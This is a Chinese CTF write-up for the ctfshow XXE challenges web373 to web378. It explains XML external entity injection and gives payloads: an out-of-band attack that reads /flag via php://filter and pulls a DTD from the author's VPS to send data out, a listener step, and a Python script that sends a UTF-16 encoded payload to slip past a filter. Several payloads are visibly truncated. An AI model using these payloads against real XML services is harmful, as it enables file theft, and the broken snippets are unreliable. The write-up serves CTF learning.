ctfshow XXE web373-web378 wp

文章目录

      • web373
      • web374-376
      • web377
      • web378

web373

XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体

ctfshow XXE web373-web378 wp_第1张图片

参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞

libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )

flag在flag里



]>

&cmd;

ctfshow XXE web373-web378 wp_第2张图片

web374-376

和373的区别是没有echo $ctfshow;,即无回显

因为没有回显,所以只能想办法带到自己vps里。

后面的题把xml头给过滤掉了,这里在vps上创建一个dtd文件,用于反弹shell

#test.dtd
<!ENTITY % dtd " ">
%dtd;
%xxe;

监听10086端口

然后POST发包即可在vps上收到

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>1</root>

ctfshow XXE web373-web378 wp_第3张图片

其实当时这里卡了许久,4台vps,有一台一直都关了安全组(只开放了两常用端口),有一台没php环境,有一台被Streamlit占用,这台就是刚刚才装的php环境。自己给自己整麻了

web377

方法和上面一样,但是过滤http,需要编码绕过。

import requests
url = 'http://b70f356b-ab20-4df6-b661-d7827322fc80.challenge.ctf.show/'
data = '''

%aaa;
]>
1'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

忒标准的 XXE


]>
&cmd;

你可能感兴趣的:(ctf,笔记,ctfshow,信息安全,php,web安全)